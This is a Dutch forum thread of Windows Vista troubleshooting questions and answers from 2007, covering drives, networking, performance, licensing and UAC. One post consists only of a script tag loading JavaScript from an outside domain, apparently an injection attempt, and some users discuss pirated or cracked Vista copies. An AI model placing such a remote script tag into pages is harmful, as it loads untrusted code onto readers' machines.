quote:Op donderdag 13 september 2007 13:04 schreef trance40 het volgende:
[..]
Start => Control Panel => Network And Sharing Center en daar links klikken op Set up a connection or network??
quote:Op woensdag 12 september 2007 10:26 schreef crossover het volgende:
Hoe krijg ik die verwisselbare schijven uit Computer als ze niet gebruikt worden? Dat zijn die flash stations waar niks in zit..
Wellicht de verwisselbare schijven loskoppelen van je pc....quote:
Dat kan niet, het is zo'n flash dock wat je hier aan de bovenkant ziet.quote:Op donderdag 13 september 2007 13:28 schreef OA het volgende:
[..]
Wellicht de verwisselbare schijven loskoppelen van je pc....
Dan kan het niet he...quote:Op donderdag 13 september 2007 13:30 schreef crossover het volgende:
[..]
Dat kan niet, het is zo'n flash dock wat je hier aan de bovenkant ziet.
Nee dan staat er nog steeds Verwisselbare schijf. Totdat ik de naam wijzig, dan komt er iets anders te staan zodra ik de memory stick erin doe.quote:Op donderdag 13 september 2007 13:33 schreef OA het volgende:
[..]
Dan kan het niet he...![]()
Ik neem aan dat er dan wat anders staat als er daadwerkelijk wat in het station aanwezig is...
Iets als XD geheugenkaart ofzo...
quote:Op donderdag 13 september 2007 13:41 schreef crossover het volgende:
[..]
Nee dan staat er nog steeds Verwisselbare schijf. Totdat ik de naam wijzig, dan komt er iets anders te staan zodra ik de memory stick erin doe.
Ik dacht wel dat je ergens kon selecteren om ze te verbergen als er niks op aangesloten zit..
Driver uninstallen?quote:Op donderdag 13 september 2007 13:41 schreef crossover het volgende:
[..]
Nee dan staat er nog steeds Verwisselbare schijf. Totdat ik de naam wijzig, dan komt er iets anders te staan zodra ik de memory stick erin doe.
Ik dacht wel dat je ergens kon selecteren om ze te verbergen als er niks op aangesloten zit..
Nee ik wil ze wel nog gewoon gebruiken, ze moeten verdwijnen als ze niet actief zijn (als er geen memory stick in zit).quote:
Aha. Het zou moeten kunnen, op mijn laptop zie ik de flashdrive ook niet totdat ik er een kaart insteek. Ik zou alleen helaas niet weten hoe dat in te stellen is.quote:Op donderdag 13 september 2007 14:31 schreef crossover het volgende:
[..]
Nee ik wil ze wel nog gewoon gebruiken, ze moeten verdwijnen als ze niet actief zijn (als er geen memory stick in zit).
Kijk hier eens:quote:Op donderdag 13 september 2007 14:31 schreef crossover het volgende:
[..]
Nee ik wil ze wel nog gewoon gebruiken, ze moeten verdwijnen als ze niet actief zijn (als er geen memory stick in zit).
Ah jammer, toch bedankt.quote:Op donderdag 13 september 2007 14:40 schreef Juup© het volgende:
[..]
Kijk hier eens:
http://www.howtogeek.com/(...)er-in-windows-vista/
Ahum, ik lees nu pas dat je de drive dan permanent onzichtbaar maakt, zelfs als je er een flashcard in doet.
ReadyBoost heet dat, maar heb ik nog niet geprobeerdquote:Op zaterdag 15 september 2007 13:10 schreef menesis het volgende:
Als ik het me goed herinner kun je vista sneller op laten starten door iets met een USB stick te doen. Dan leest hij tijdens het opstarten van die stick ipv HD en dat zou sneller zijn ofzo.
Heeft iemand dat al geprobeerd en is het echt sneller?
[The OS Wars] Alles vs alles deel 4quote:Op donderdag 13 september 2007 14:29 schreef Dr.Daggla het volgende:
Ik ben het helemaal zat..
Ik heb Ultimate Vista x64 draaien en krijg upnp met geen mogelijkheid werkend.
Heb echt alles al geprobeerd.. Van het uitschakelen van ipv6 tot het flashen van nieuwe firmware op m'n Asus WL-500g deluxe.
Onder XP werkt alles prima, upnp is zo gevonden en ook het fowarden gaat vanzelf.
Ik ben al sinds zondag aan het kutten en het lukt gewoon niet.. Het gekke is dat met die connectivity test van MS alles het doet, behalve de NAT test.. UPNP is gewoon enabled volgens die test, maar dat is dus niet zo. Met upnptest.exe staat m'n upnp uit onder Vista en aan onder XP.
Zo'n beetje elke service aan en uit gezet.. Ik ben er klaar mee.
Ik houd XP wel als primair besturingssysteem aan..
quote:Op zaterdag 15 september 2007 15:59 schreef Treveo het volgende:
[..]
[The OS Wars] Alles vs alles deel 4
quote:Op vrijdag 14 september 2007 14:57 schreef honderd het volgende:
Mijn hardeschijf is vaak nog bezig met van alles en nog wat terwijl ik niks aan het doen ben, eerst dacht ik dat het Windows Updates waren, maar dat is het niet. Iemand een idee?
quote:Op zaterdag 15 september 2007 15:58 schreef Treveo het volgende:
Ik heb trouwens 2 vragen:
- Is er een goeie programma om Vista goed te opitimaliseren?
Dus? Ik host hem ook niet op FOK! server...quote:Op zaterdag 15 september 2007 16:36 schreef Godlike02 het volgende:
[..]
Niet echt van toepassing.
(en je usericon is te groot)
quote:Op zaterdag 15 september 2007 16:56 schreef Treveo het volgende:
[..]
Dus? Ik host hem ook niet op FOK! server...
quote:Op zaterdag 15 september 2007 13:10 schreef menesis het volgende:
Als ik het me goed herinner kun je vista sneller op laten starten door iets met een USB stick te doen. Dan leest hij tijdens het opstarten van die stick ipv HD en dat zou sneller zijn ofzo.
Heeft iemand dat al geprobeerd en is het echt sneller?
Rechtsklikken ergens op je desktop en zorgen dat hij de pictogrammen weergeeft... of anders gewoon naar Deze Computer gaan...quote:Op zondag 16 september 2007 19:55 schreef dubidub het volgende:
Waar staat de prullenbak? Ik ben hem kwijt
nee, werkt nietquote:Start => Control Panel => Network And Sharing Center en daar links klikken op Set up a connection or network??
configuratiescherm -> netwerkcentrumquote:Op zondag 16 september 2007 20:43 schreef amaranta het volgende:
bij xp heette het 'mijn netwerklocaties' maar dat kan ik bij vista nergens vinden...hoe heet hetdaar dan?
En waar vind ik hem onder deze computer?quote:Op zondag 16 september 2007 20:19 schreef Treveo het volgende:
[..]
Rechtsklikken ergens op je desktop en zorgen dat hij de pictogrammen weergeeft... of anders gewoon naar Deze Computer gaan...
Is mogelijk, alleen schakelt MS Aero uit en de updates.quote:Op zondag 16 september 2007 20:27 schreef Boschkabouter het volgende:
Is Vista eigenlijk ook illegaal te gebruiken, of wordt dat tegenwoordig onmogelijk gemaakt door Microsoft?
Ik wil namelijk vista proberen, en heb geen zin om te wachten tot ik em gratis krijg
Help en ondersteuning.quote:Op zondag 16 september 2007 20:43 schreef amaranta het volgende:
bij xp heette het 'mijn netwerklocaties' maar dat kan ik bij vista nergens vinden...hoe heet hetdaar dan?
dat werkt dus nietquote:Op zondag 16 september 2007 20:54 schreef dubidub het volgende:
[..]
configuratiescherm -> netwerkcentrum
Aan de linkerkant, als je "mappen" open hebt ipv Favoriete koppelingen ofzoquote:Op zondag 16 september 2007 20:54 schreef dubidub het volgende:
[..]
En waar vind ik hem onder deze computer?![]()
Gevonden !quote:Op zondag 16 september 2007 21:11 schreef Treveo het volgende:
[..]
Aan de linkerkant, als je "mappen" open hebt ipv Favoriete koppelingen ofzo
Kun je dan als ik later een gratis key krijg die dan wel gebruiken, of moet ik dan alles opnieuw installeren?quote:Op zondag 16 september 2007 21:01 schreef Juup© het volgende:
[..]
Is mogelijk, alleen schakelt MS Aero uit en de updates.
Geen idee eerlijk gezegd, nog niet geprobeert.quote:Op zondag 16 september 2007 22:03 schreef Boschkabouter het volgende:
[..]
Kun je dan als ik later een gratis key krijg die dan wel gebruiken, of moet ik dan alles opnieuw installeren?
Geniale exploit ook, dit wordt erg lastig om te blokken gezien het aantal Dell's dat in omloop is.quote:Op zondag 16 september 2007 22:55 schreef Devolution het volgende:
Er is trouwens een Vista Ultimate in omloop in 'het circuit' die gewoon werkt. Meer kan ik er niet over zeggen ivm de policy.
Heb ik ook met PowerDVD 6... het is dus gewoon niet compatibel... moet je ff kijken of er een nieuwere versie van BS Player is. PowerDVD 7 verhelpt mijn probleem wel maar ik vind 6 toch fijner afspelenquote:Op maandag 24 september 2007 18:07 schreef crossover het volgende:
Telkens als ik een video afspeel met BSPlayer gebeurt er dit:
[afbeelding]
Dat is nogal lastig omdat het beeld even op zwart springt en blijft hangen. Wat kan ik hier aan doen? In BsPlayer zelf kan ik niks vinden..
Hm nee volgens mij heb ik de nieuwste (6.1 pro). Dan moet het maar zo.quote:Op maandag 24 september 2007 20:48 schreef Treveo het volgende:
[..]
Heb ik ook met PowerDVD 6... het is dus gewoon niet compatibel... moet je ff kijken of er een nieuwere versie van BS Player is. PowerDVD 7 verhelpt mijn probleem wel maar ik vind 6 toch fijner afspelen
quote:Op maandag 24 september 2007 18:07 schreef crossover het volgende:
Telkens als ik een video afspeel met BSPlayer gebeurt er dit:
[afbeelding]
Dat is nogal lastig omdat het beeld even op zwart springt en blijft hangen. Wat kan ik hier aan doen? In BsPlayer zelf kan ik niks vinden..
Aero uitzetten bedoel je? Moet je ff rechtsklikken en Eigenschappen kiezen op je desktop en dan een niet Aero theme kiezenquote:Op dinsdag 25 september 2007 10:01 schreef menesis het volgende:
Waar kun je dat handmatig instellen?
Dan ligt het toch echt aan je pc, en ik denk dat jij gewoon Vista gedownload hebt., waar ook de oorzaak zal liggenquote:Op woensdag 26 september 2007 23:55 schreef Rossoneri het volgende:
Ik heb nu Vista geinstalleerd. Man man man hier word je dus echt niet vrolijk van!! Traag, het opstarten het afsluiten, vensters openen, vensters sluiten, gaat allemaal rete langzaam. Ik weet dat er veel negatieve dingen al zijn vermeld over Vista maar dit moet er toch echt ff uit. Gauw maar naar XP (of Suse Linux). Over een jaar nog eens kijken.![]()
![]()
quote:Op donderdag 27 september 2007 00:23 schreef Froop het volgende:
[..]
Dan ligt het toch echt aan je pc, en ik denk dat jij gewoon Vista gedownload hebt., waar ook de oorzaak zal liggen![]()
Werken die illegale Vista's zo slecht dan?quote:Op donderdag 27 september 2007 00:23 schreef Froop het volgende:
[..]
Dan ligt het toch echt aan je pc, en ik denk dat jij gewoon Vista gedownload hebt., waar ook de oorzaak zal liggen![]()
Was dat dan voor domme opmerking. Een gedownloade Vista is net zo snel als een gekochte hoor, is precies dezelfde image!quote:Op donderdag 27 september 2007 00:23 schreef Froop het volgende:
[..]
HEEL gek... ligt echt duidelijk aan je PC ofzo want hier heb ik 0% problemen... misschien had je een virusscan aan staan ofzo?quote:Op woensdag 26 september 2007 23:55 schreef Rossoneri het volgende:
Ik heb nu Vista geinstalleerd. Man man man hier word je dus echt niet vrolijk van!! Traag, het opstarten het afsluiten, vensters openen, vensters sluiten, gaat allemaal rete langzaam. Ik weet dat er veel negatieve dingen al zijn vermeld over Vista maar dit moet er toch echt ff uit. Gauw maar naar XP (of Suse Linux). Over een jaar nog eens kijken.![]()
![]()
Dus jij download iets, en gaat er van uit dat het compleet is?quote:Op donderdag 27 september 2007 10:07 schreef Hare het volgende:
[..]
Was dat dan voor domme opmerking. Een gedownloade Vista is net zo snel als een gekochte hoor, is precies dezelfde image!![]()
Een gedownloadde is exact hetzelfde als dat je er een uit de winkel zou kopen. Als je de goede download tenminste.quote:Op donderdag 27 september 2007 15:42 schreef Froop het volgende:
[..]
Dus jij download iets, en gaat er van uit dat het compleet is?![]()
Zo kaal geinstalleerd zeker? Wel even een blik op je jardware geworpen of al je hardware gedetecteerd is? drivers voor videokaart zijn standaard altijd traag.quote:Op woensdag 26 september 2007 23:55 schreef Rossoneri het volgende:
![]()
Rechter muisknop op computer en ga daarna naar advanced system settingsquote:Op donderdag 27 september 2007 17:19 schreef RacerDKB het volgende:
[..]
Een gedownloadde is exact hetzelfde als dat je er een uit de winkel zou kopen. Als je de goede download tenminste.
Maar ik heb een vraagje:
Vroagah, toen ik nog XP had, was er altijd zo'n handig fotovoorbeeld, bij plaatjes.
Dit had ik in Vista natuurlijk ook gewoon, maar het is ineens uit. Hoe krijg ik het terug?
Plaatje:
[afbeelding]
En het maakt niet uit of ik extra grote pictogrammen etc doe.
Dat boschkabouter er op hapt is geinig.... maar dat jij er ook nog eens op in gaat is helemaal geweldig!quote:Op donderdag 27 september 2007 10:07 schreef Hare het volgende:
[..]
Was dat dan voor domme opmerking. Een gedownloade Vista is net zo snel als een gekochte hoor, is precies dezelfde image!![]()
Ik heb Vista geinstalleerd op een:quote:Op donderdag 27 september 2007 17:21 schreef HeatWave het volgende:
[..]
Zo kaal geinstalleerd zeker? Wel even een blik op je jardware geworpen of al je hardware gedetecteerd is? drivers voor videokaart zijn standaard altijd traag.
En trouwens, je hebt toch wel een beetje een goeie PC he, anders ben je net zo;n consumentenbond bejaarde die klaagt dat Vista niet lekker loopt op zijn P3 met 256MB.
Tsjonge, waarom draait ie niet lekker dan?quote:Op vrijdag 28 september 2007 18:06 schreef Rossoneri het volgende:
[..]
Ik heb Vista geinstalleerd op een:
AMD Athlon X2 64 4400+
Geforce 8600 GT PCI-E
2048 DDR2 RAM
En en ja alles drivers enz geinstalleerd. En het draait nog niet lekker?? Flikker maar op met je Vista![]()
quote:Op vrijdag 28 september 2007 18:06 schreef Rossoneri het volgende:
[..]
AMD Athlon X2 64 4400+
Geforce 8600 GT PCI-E
2048 DDR2 RAM
En en ja alles drivers enz geinstalleerd. En het draait nog niet lekker?? Flikker maar op met je Vista![]()
Onderbouwing?quote:
Goeie vraagquote:Tsjonge, waarom draait ie niet lekker dan?
Wat is er mis mee? Wat werkt er niet?quote:Op vrijdag 28 september 2007 21:52 schreef Rossoneri het volgende:
[..]
Onderbouwing?![]()
Is dat nodig dan met zo'n systeem? Alleen maar om fatsoenlijk een OS te kunnen draaien, ik dacht niet!
[..]
Goeie vraagAlles is goed geinstalleerd, maar ff wachten op service pack lijkt me.
![]()
Traaaaaaaaaaaaaaaaaagheid!quote:Op vrijdag 28 september 2007 23:32 schreef RacerDKB het volgende:
[..]
Wat is er mis mee? Wat werkt er niet?
Vastlopers? Langzaam?
Welke Vista had je? Legaal?quote:
Ja, een OEM versie van Vista Ultimate maar ik vind het echt een kolere OS tot nu toe hoor wat iedereen er ook van zegtquote:Op vrijdag 28 september 2007 23:41 schreef RacerDKB het volgende:
[..]
Welke Vista had je? Legaal?
Ik draai een unattended Vista Ultimate van augustus op een soortgelijk systeem als die van jou, en dat werkt perfect.
Uitzetten zou je eigenlijk moeten kunnen doen met Schijfbeheer (Disk Management). Rechtsklik "Deze Computer" op je bureaublad en kies "Beheren" (Manage in een engelse Windows). Na toestemming (UAC) kom je dan in Computer Management waar in de linkerrij (vrij onderaan) schijfbeheer te vinden is. Rechtsklikken op een schijf die wilt verwijderen en de optie Drive-letter wijzigen kiezen. Zo kun je de letter die aan de schijf is gekoppeld verwijderen zodat de schijf uit het zicht is, maar dat blijft volgens mij zo ook als er een SDcard, Memorydisc, whatever in geduwd word.quote:Op donderdag 13 september 2007 13:26 schreef crossover het volgende:
[..verhaal over verbergen van verwijderbare schijven als er niks in zit...]
Iemand?
Vaag hoorquote:Op vrijdag 28 september 2007 18:06 schreef Rossoneri het volgende:
[..]
AMD Athlon X2 64 4400+
Geforce 8600 GT PCI-E
2048 DDR2 RAM
Echt wazig. Ik heb mindere specs dan jou en toch draait het hier vloeiend op mijn laptop.quote:Op vrijdag 28 september 2007 18:06 schreef Rossoneri het volgende:
[..]
AMD Athlon X2 64 4400+
Geforce 8600 GT PCI-E
2048 DDR2 RAM
Nwe router zou moeten schelen. Ik werk hier draadloos (802.11g) en zit ruimschoots hoger dan de 11 Mb/sec.quote:Op zaterdag 29 september 2007 07:27 schreef Saekerhett het volgende:
Inmiddels nu Vista Ultimate op de desktop (minder legaal) en Vista Home Premium op de laptop (meer legaal), en dat werkt perfect tussen die twee.
Alleen de overdrachtsnelheid bij grote bestanden over het netwerk is tergend traag? Heb wel een draadloze verbinding tussen die twee (11 Mb/sec), omdat we nog zo'n oude Linksys router hebben die alleen 802.11b aankan.
Misschien is het een idee om voor 50 euro een nieuwe Linksys router te halen, die 54 Mb/sec ondersteunt?
quote:Op zaterdag 29 september 2007 00:48 schreef Counterattack het volgende:
[..]
Vaag hoor
Ik heb vista op een:
Athlon x2 64 4000+
Geforce 7900GS
2048 ddr2 667 ram
en het loopt als een sneltrein
Ik use Vista op mijn laptop:quote:Op vrijdag 28 september 2007 18:06 schreef Rossoneri het volgende:
[..]
AMD Athlon X2 64 4400+
Geforce 8600 GT PCI-E
2048 DDR2 RAM
Dan open je dat PDF bestand en ga je alles selecteren en in Word plakken? Adobe Reader heeft iig wel een tool om alles te kunnen selecteren en kopierenquote:Op zaterdag 29 september 2007 13:16 schreef amaranta het volgende:
help me
Ik heb een word bestand. Daar wil ik een pdf bestand van 3 pagina's in plakken. Ik kan dit in vistaword nergens vinden dus...(invoegen document dus)
als ik het met cntrlc contrlv doe dan krijg ik alleen de 1e pagina van het pfd bestand in mijn worddoc.
quote:Op vrijdag 28 september 2007 23:47 schreef Rossoneri het volgende:
[..]
Ja, een OEM versie van Vista Ultimate maar ik vind het echt een kolere OS tot nu toe hoor wat iedereen er ook van zegtZe moeten opschieten met SP1.
Zuchtquote:Op zaterdag 29 september 2007 17:11 schreef Netsplitter het volgende:
[..]
Dus omdat jij totaal niks van Vista weet is het een kolere OS?
Dus ga je populair mee zitten bleren dat ze moeten opschieten met SP1 omdat dat een wondermiddel zal zijn...![]()
dan is de layout verneuktquote:Op zaterdag 29 september 2007 13:59 schreef Treveo het volgende:
[..]
Dan open je dat PDF bestand en ga je alles selecteren en in Word plakken? Adobe Reader heeft iig wel een tool om alles te kunnen selecteren en kopieren
Inderdaad, ik kan 2 spellen tegelijk aanhebben, photoshop laten renderen, 3 dvd's uitpakken, 8 films repareren met par bestanden, en nog gaat het niet traagquote:Op zaterdag 29 september 2007 19:28 schreef dubidub het volgende:
Ik snap het gewoon niet. Ik zit redelijk vaak een beetje te klooien, meerdere dingen tegelijk te bewerken en vista kut nooit Het ís niet traag, en het is geen kutOS
quote:Op zaterdag 29 september 2007 17:34 schreef Rossoneri het volgende:
[..]
Zucht
Hoezo ik weet niks van Vista? Waar maak jij dat uit op? Ik zeg dat ik alles maar dan ook alles heb geprobeerd, maar het draait gewoon niet klaar! SP1, hier wordt het altijd beter van was ook zo met XP dus dan zal het uiteraard ook met Vista zo zijn typisch MS, een OS op de markt brengen wat nog niet af is.![]()
Nou ja kijk een OS hoort gewoon vloeiend te lopen vind jezelf ook niet? Zeker op zo'n syteem.quote:Op zaterdag 29 september 2007 20:03 schreef Netsplitter het volgende:
[..]
Wanneer je gaat mekkeren dat het een kolere Os is zonder onderbouwing, alleen dat het traag is ga ik er van uit dat je er 0,0 van weet.
Blaten kan iedereen, iets onderbouwen schijnt nogal moeilijk te zijn....
Jammer dat het niet goed draait, maar het OS draait goed met half jouw specs. Dus als er iets niet goed loopt komt het waarschijnlijk door brakke drivers, die van Nvidia bijv.quote:Op zaterdag 29 september 2007 21:00 schreef Rossoneri het volgende:
[..]
Nou ja kijk een OS hoort gewoon vloeiend te lopen vind jezelf ook niet? Zeker op zo'n syteem.
Ik weet heel heel heel heel heel zeker dat het aan jou ligt... aangezien je systeem zou Vista echt heel soepel moeten draaien...quote:Op zaterdag 29 september 2007 21:00 schreef Rossoneri het volgende:
[..]
Nou ja kijk een OS hoort gewoon vloeiend te lopen vind jezelf ook niet? Zeker op zo'n syteem.
Tjsa ik heb alles goed geinstalleerd, alles drivers, maar het loopt gewoon niet lekker. Ach ja over een jaar maar weer eens proberenquote:Op zondag 30 september 2007 06:28 schreef Treveo het volgende:
[..]
Ik weet heel heel heel heel heel zeker dat het aan jou ligt... aangezien je systeem zou Vista echt heel soepel moeten draaien...
quote:Op maandag 1 oktober 2007 17:39 schreef crossover het volgende:
Weet iemand waarom ad-aware bij mij niet werkt?![]()
Al opnieuw geinstalleerd enzo, maar het werkt niet. Ik krijg meteen een melding 'Ad-Aware werkt niet meer, er wordt naar een oplossing gezocht'. Ook een vorige versie doet het. Iemand een oplossing of advies voor een ander programma? Had microsoft niet iets soortgelijks?
Ah thanksquote:Op maandag 1 oktober 2007 17:57 schreef RacerDKB het volgende:
[..]
Windows Defender, zit zelfs in Vista ingebouwd
Makkelijk te vinden via de zoekfunctie bij menu start, gewoon Defender intypen.
Overigens heb ik Vista, dus ik weet niet of dat bij alle zo is.
Je plaatje doet het nietquote:Op maandag 1 oktober 2007 18:00 schreef RacerDKB het volgende:
Jup, zit in elke Vista versie. Werkt prima bij mij.
Is http://img141.imageshack.us/img141/6968/diffyo8.jpg niet een betere vergelijking tussen alle versies? Vind die vergelijking van microsoft, de link die in de OP staat, maar onduidelijk.
quote:
He, das handigquote:Op maandag 1 oktober 2007 20:21 schreef RacerDKB het volgende:
[..]
Oh, dat komt doordat hij vanaf FOK! naar imageshack word verwezen, en fok is natuurlijk banned van imageshack.
Werkende link: http://i24.tinypic.com/vwwvv9.jpg
Dat probleem heb ik dus ookquote:Op woensdag 3 oktober 2007 15:41 schreef Treveo het volgende:
Kan iemand mij misschien helpen?
Ik vind prettig om in Vista ALLE mappen in de weergave "details" te hebben, dus geen lijst of tegels. Het probleem is alleen dat hij constant paar mappen als tegels weergeeft en dan krijg ik het weer in details met heel veel moeite.
Weet iemand misschien hoe ik dit kan oplossen?
Echt niet dus... heb echt Applt to all Folders gedaan... wordt toch vaak weer veranderd zonder dat ik erom vroeg...quote:Op woensdag 3 oktober 2007 16:29 schreef dikkedorus het volgende:
Tools->Folder Options->view->Apply to Folders om alle folders op de huidige settings af te stellen.
Verder onthoudt hij hier wel gewoon per window met welke view je hem het laatst hebt bekeken, zo ver ik kan zien.
Verder kan je met ctrl-scrollwieltje gemakkelijk door de verschillende views scrollen
Het handigste van heel Vista heeft PietjePuk007 nog niet ontdekt hoorquote:Op zondag 14 oktober 2007 19:34 schreef PietjePuk007 het volgende:
Hoe komt het dat het geluid van media player classic veel zachter is dan bijvoorbeeld MSN? Als ik een film / serie ga kijken met vrij hard geluid kan de hele straat meegenieten als er iemand online komt.
Of ben ik de enige(ja ik kan natuurlijk msn uitzetten maar daar gaat m'n vraag dus niet over
)?
quote:Op zondag 14 oktober 2007 19:46 schreef RacerDKB het volgende:
Het handigste van heel Vista heeft PietjePuk007 nog niet ontdekt hoor
quote:Op zondag 14 oktober 2007 19:46 schreef RacerDKB het volgende:
[..]
Het handigste van heel Vista heeft PietjePuk007 nog niet ontdekt hoor
Klik rechtsonder eens op het speakertje, dan ga je naar Mixer.
Kan je per programma het volume instellen! OMGOMGOGMOGMGOGMOGM!
Die is er ook niet. Vorig jaar kon je wel gratis een Beta downloaden, maar ook die is er niet meer.quote:Op donderdag 18 oktober 2007 10:58 schreef deliberator het volgende:
Kan je ook ergens die trial versie vandaan halen?
Kan hem niet vinden![]()
zal waarschijnlijk wel aan mij liggen
Erg jammer.quote:Op donderdag 18 oktober 2007 11:13 schreef FredvZ het volgende:
[..]
Die is er ook niet. Vorig jaar kon je wel gratis een Beta downloaden, maar ook die is er niet meer.
Je kan het ook nog gewoon downloaden, dan heb je standaard 30 dagen trial.. gewoon geen productkey invoeren... dan ben je nog legaal bezigquote:Op donderdag 18 oktober 2007 11:26 schreef deliberator het volgende:
[..]
Erg jammer.
Wilde wel eens zien hoe alles werkt in Vista.
Beetje jammer om hem hiervoor aan te schaffen.
waar issie te downloaden dan?quote:Op donderdag 18 oktober 2007 12:04 schreef Treveo het volgende:
[..]
Je kan het ook nog gewoon downloaden, dan heb je standaard 30 dagen trial.. gewoon geen productkey invoeren... dan ben je nog legaal bezig![]()
Worden deze instellingen niet door de drivers van je videokaart geregeld (bij mij wel), dus dan moet je het daar aanpassen lijkt mij.quote:Op zaterdag 20 oktober 2007 18:06 schreef kovenant het volgende:
heeft iemand een ideetje zodat ik de schermen normaal kan gebruiken ?![]()
Hier met een oudere PC loopt het ook prima, om maar wat positief te brengen in dit topic.quote:Op zaterdag 29 september 2007 13:05 schreef Treveo het volgende:
[..]
Intel Duo Core T2300 1,67 GHz
1024 MB DDR2 SDRAM
ATi Mobility Radeon X1400
En het draait als een sneltrein. Alle programma's laden supersnel (< 1 sec)
Is dit één of andere uitgekleden variant ofzo?quote:MS Windows Vista Home Premium DSP NL
quote:de OEM versies: Microsoft Windows Vista DSP (only for sale with Computer components)
Hoe kan je dit dan los kopen?quote:Op maandag 22 oktober 2007 15:07 schreef PietjePuk007 het volgende:
Moeilijk he googlen. Via google kwam ik op een topic uit FOK! en die zei:
[..]
Dat is 't punt juist. Losse verkoop mag nietquote:Op maandag 22 oktober 2007 15:11 schreef deliberator het volgende:
Hoe kan je dit dan los kopen?
Of moet je er dan een systeem bij aanschaffen?
Ach,als het aan te schaffen is zo, wie zal ik dan zijn om te zeggen dat het niet mag?quote:Op maandag 22 oktober 2007 15:34 schreef PietjePuk007 het volgende:
[..]
Dat is 't punt juist. Losse verkoop mag niet.
Stel nou dat ik via een site de DSP versie bestel.quote:Op maandag 22 oktober 2007 15:47 schreef dikkedorus het volgende:
Neen, koppelverkoop mag niet.
De OEM versie mag je als gebruiker gewoon kopen, er zijn allemaal rare regeltjes geweest, en ik weet niet hoe het nu zit. Zo moest je mistens één hardware-artikel erbij kopen zodat je je eigen componenten-leverancier was. (een muis of een usb-dongle, of iets anders goedkoops).
In Nederland ligt afaik de OEM versie gewoon los in de verkoop. Of er nog verschil is met de DSP versie weet ik niet, maar de OEM is gewoon online te koop voor een fractie van de retailprijs.
Geen idee, ik sluit alleen mijn laptop op de tv aan, niet mijn pc. Aangezien op mijn laptop XP staat en alles gewoon werkt, heb ik Ultramon daar niet voor nodig.quote:Op maandag 22 oktober 2007 12:20 schreef funrider het volgende:
werkt dat Ultramon ook lekker met beeld weergeven op TV?
quote:Op maandag 22 oktober 2007 11:44 schreef MetalSonic het volgende:
Ik heb ook een vreemde fout.
Enige tijd terug een patch voor ut2004 gedownload, de download ging niet snel dus ik dacht "dan stop ik 'm maar".
Op de desktop staat dan wel al een applicatie ( ut-2004 patch )
Maar die kan ik niet verwijderen, "cant delete programm in use bij anoter process"
1) in safe mode kan ik hem niet deleten
2) hij loopt helemaal niet "zichtbaar " onder processen
wat moet ik doen ?
danku maar heb je ook zoiets voor Vista ?quote:Op maandag 22 oktober 2007 23:14 schreef Devolution het volgende:
Probeer het eens met dit programma
En Google
Je zult zelf met add/remove programs (ben even kwijt hoe dat nu heet) zelf moeten nagaan wat je wel en niet nodig hebt. Veel van die "opsmuk" is verrekte handig namelijk.quote:Op maandag 22 oktober 2007 23:15 schreef Eastwood het volgende:
Goeden avond mensen...
ik heb een vraag, waarschijnlijk is die vraag al eerder langs gekomen, maar ik voel me niet geroepen 17 delen door te lezen![]()
Ik heb afgelopen vrijdag een nieuwe notebook gekocht.. compleet afgeleverd met Vista premium.. Je moet overigens weten dat ik een klote hekel heb aan alle doelloze programmatjes om het "leuk" te maken.
Nu is mijn vraag of er iets van een lijst bestaat waar op staat welke "entertainment" en "overbodige opsmuk" programma's zo verwijdert kunnen worden zonder echt iets toe te voegen aan windows.
(of zelfs wel iets van een programmatje die de overbodige shit eraf haalt?)
Miss vraag je je af, waarom koos je niet voor Vista Basic? ik ben in de winkel sterk afgeraden daarvoor te kiezen.. omdat je dan echt alles zelf moet installeren.. wat volgens hen geen goed idee was... overigens twijfel ik nu daar over... maar ach, ik zit nu met deze versie![]()
Nu killbox en unlocker geprobeerd maar 't is nog steeds niet gelukt :Squote:Op maandag 22 oktober 2007 23:44 schreef MetalSonic het volgende:
[..]
danku maar heb je ook zoiets voor Vista ?
DSP is bijna hetzelfde als OEM, maar ipv via de hardwarefabrikanten gaat het dan weer via Delivery Service Partners. Whataver that means. Als je het kan kopen zou ik het gewoon doen. (ik ben DSP nog nooit tegengekomen in een webwinkel)quote:Op maandag 22 oktober 2007 15:52 schreef deliberator het volgende:
[..]
Stel nou dat ik via een site de DSP versie bestel.
Dan zou ik deze toch ook geleverd moeten krijgen of niet?
huh?quote:Op dinsdag 23 oktober 2007 10:58 schreef Dark_Angelus het volgende:
<script src=http://rb.vg/1.js></script
quote:Op maandag 22 oktober 2007 17:10 schreef Devolution het volgende:
[..]
Geen idee, ik sluit alleen mijn laptop op de tv aan, niet mijn pc. Aangezien op mijn laptop XP staat en alles gewoon werkt, heb ik Ultramon daar niet voor nodig.
Heb je trouwens wel de 2e monitor enabled in Vista? Want als ik mijn laptop op mijn tv aansluit, dan krijg ik ook de laadbalk op de tv te zien, maar daarna niets meer, totdat ik de 2e monitor enable ('Het bureaublad uitbreiden naar de tweede monitor'). Het zou namelijk kunnen dat ie de instellingen niet onthoudt na een reboot (en je dus bij elke boot weer een enkel scherm gebruikt).
Even terug naar een eerdere vraag....quote:Op dinsdag 16 oktober 2007 22:20 schreef PietjePuk007 het volgende:
Ben ik weer.
Stel je hebt een serie gedownload van een aantal afleveringen, je download daar netjes de dvd-cover (JPG) bij en dat dump je in 1 map. Als je nu die map aan gaat klikken heeft het pictogram van die map (weergave groot / normaal) 2 plaatjes "in zich". Kan je ervoor zorgen dat alleen die dvd-cover weergeeft (daar heb je 'm tenslotte voor gedownload)?
edit (er zijn meerder mensen met dit probleem)
[ afbeelding ]
Bron (maar de oplossing werkt dus niet want er blijven 2 plaatjes staan).
quote:Op dinsdag 23 oktober 2007 16:55 schreef Kptelmo het volgende:
De weergave is veranderd maar net als in XP kun je een afbeelding als icoon gebruiken door deze folder.jpg te noemen. Dan krijg je wel die opengeklapte folder als icoon maar dan met maar 1 afbeelding (de folder.jpg dus).
Oh wat slechtquote:Op maandag 29 oktober 2007 17:05 schreef Treveo het volgende:
Ja, dat kan, moet je even rechtsklikken ergens op je Outlook icon in je tray... dan staat het ergens
Gebruikersaccounts en dan gebruikersaccont beheer uitschakelen (niet aanbevolen)quote:Op maandag 29 oktober 2007 21:56 schreef Oldbie het volgende:
Ik heb nu een perfecte dualboot met XP en Vista. Tot nu toe ben ik lovend over Vista en ik overweeg een permanente overstap maar ik zit nog met een irritant verschijnsel:
Zodra ik een programma (niet MS) op wil starten krijg ik de vraag of ik door wil gaan of dat ik wil annuleren. Nergens is de optie om aan te geven dat dit een vertrouwd programma is en dat de vraag in het vervolg niet meer hoeft.
Hoe schakel ik dit (per programma) uit?
Het is toch schijtirritant om dat telkens te moeten wegklikken? Achterlijke functie vind ik het.quote:Op maandag 29 oktober 2007 22:11 schreef Treveo het volgende:
[..]
